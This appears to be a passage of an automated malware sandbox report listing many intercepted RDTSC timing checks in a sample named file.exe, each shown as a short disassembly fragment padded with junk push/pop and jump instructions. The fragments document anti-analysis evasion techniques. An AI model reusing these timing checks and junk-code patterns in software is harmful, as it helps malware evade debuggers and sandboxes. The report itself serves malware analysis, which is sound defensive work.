                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E301 second address: 107E317 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F0C5CC1AFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E317 second address: 107E337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C5DBE21E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnl 00007F0C5DBE21D6h 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E49A second address: 107E49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E49E second address: 107E4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4B6 second address: 107E4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4BA second address: 107E4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4BE second address: 107E4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F0C5CC1AFC6h 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4D1 second address: 107E4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E9DB second address: 107E9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E9DF second address: 107E9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0C5DBE21D6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085106 second address: 108511E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C5CC1AFCEh 0x0000000b push esi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083DC6 second address: 1083DD2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007F0C5DBE21D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083F49 second address: 1083F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083F4D second address: 1083F98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F0C5DBE21DCh 0x00000013 jmp 00007F0C5DBE21E2h 0x00000018 jmp 00007F0C5DBE21DFh 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083F98 second address: 1083FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0C5CC1AFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007F0C5CC1AFCDh 0x00000016 pop esi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a push ecx 0x0000001b jmp 00007F0C5CC1AFD4h 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083FD4 second address: 1083FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0C5DBE21D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108411B second address: 1084131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CC1AFCDh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084131 second address: 1084137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10845FE second address: 108460C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0C5CC1AFC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084DF8 second address: 1084E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007F0C5DBE21D6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 jg 00007F0C5DBE21D6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10882A7 second address: 10882B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F0C5CC1AFC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10882B3 second address: 10882DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F0C5DBE21D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007F0C5DBE21E3h 0x00000016 pop ebx 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10882DB second address: 10882E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0C5CC1AFC6h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108ABFB second address: 108AC0F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C5DBE21D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jne 00007F0C5DBE21D6h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108AC0F second address: 108AC26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CC1AFD1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108AC26 second address: 108AC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108AC2A second address: 108AC2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DBDB second address: 108DBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D49B second address: 108D49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D49F second address: 108D4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0C5DBE21DCh 0x0000000c jnc 00007F0C5DBE21D6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D4B8 second address: 108D4CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C5CC1AFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0C5CC1AFCBh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D4CF second address: 108D4DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C5DBE21D6h 0x00000008 ja 00007F0C5DBE21D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094C67 second address: 1094C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F0C5CC1AFC6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094C82 second address: 1094C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094C86 second address: 1094C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094DF3 second address: 1094E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jbe 00007F0C5DBE21D6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094F3C second address: 1094F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F0C5CC1AFC6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094F4B second address: 1094F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109509A second address: 10950A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950A0 second address: 10950BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C5DBE21D6h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F0C5DBE21DDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BF53 second address: 104BF59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BF59 second address: 104BF93 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C5DBE21DCh 0x00000008 jc 00007F0C5DBE21D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 or ecx, 385BC95Ch 0x00000019 push 00000004h 0x0000001b mov dword ptr [ebp+122D2B9Eh], eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 jmp 00007F0C5DBE21E4h 0x0000002a pop edi 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A5F9 second address: 109A61D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CC1AFCCh 0x00000009 jmp 00007F0C5CC1AFD4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099D42 second address: 1099D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E89 second address: 1099E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E90 second address: 1099EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E0h 0x00000007 jbe 00007F0C5DBE21DEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099FF0 second address: 1099FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099FF4 second address: 109A00F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A00F second address: 109A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A015 second address: 109A01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A01D second address: 109A021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A2ED second address: 109A2F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E30C second address: 109E332 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C5CC1AFC6h 0x00000008 jmp 00007F0C5CC1AFD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E332 second address: 109E336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E336 second address: 109E33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D8FE second address: 109D928 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0C5DBE21DEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0C5DBE21E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D928 second address: 109D934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0C5CC1AFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D934 second address: 109D938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D938 second address: 109D93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D93C second address: 109D94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jg 00007F0C5DBE21D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DBFF second address: 109DC09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DC09 second address: 109DC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DC0D second address: 109DC29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DC29 second address: 109DC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DDAA second address: 109DDC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCCh 0x00000007 jnp 00007F0C5CC1AFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jg 00007F0C5CC1AFC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A55B5 second address: 10A55BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5B3F second address: 10A5B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCCh 0x00000007 js 00007F0C5CC1AFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0C5CC1AFD7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5B6E second address: 10A5B74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A610B second address: 10A6114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6114 second address: 10A611A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6695 second address: 10A669B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A669B second address: 10A669F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A669F second address: 10A66C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F0C5CC1AFD3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A66C4 second address: 10A66C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A699B second address: 10A69D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C5CC1AFC6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F0C5CC1AFD2h 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jbe 00007F0C5CC1AFC6h 0x00000025 pushad 0x00000026 popad 0x00000027 jno 00007F0C5CC1AFC6h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A69D6 second address: 10A69F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C5DBE21E3h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6F8B second address: 10A6FB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0C5CC1AFD0h 0x00000008 pop edx 0x00000009 jg 00007F0C5CC1AFCCh 0x0000000f ja 00007F0C5CC1AFC6h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FB6 second address: 10A6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0C5DBE21E4h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FCF second address: 10A6FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FD5 second address: 10A6FDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8E1 second address: 10AC8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8E7 second address: 10AC8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0C5DBE21DDh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8F9 second address: 10AC8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8FF second address: 10AC915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DBE21E2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC915 second address: 10AC946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0C5CC1AFD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC946 second address: 10AC959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F0C5DBE21DEh 0x0000000b jo 00007F0C5DBE21D6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC959 second address: 10AC965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0C5CC1AFC6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC965 second address: 10AC97A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADE7D second address: 10ADE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADE81 second address: 10ADE90 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C5DBE21D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADE90 second address: 10ADE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0C5CC1AFC6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0CB0 second address: 10B0CBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C5DBE21D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0E04 second address: 10B0E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0E08 second address: 10B0E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0C5DBE21E9h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F0C5DBE21DDh 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 rdtsc
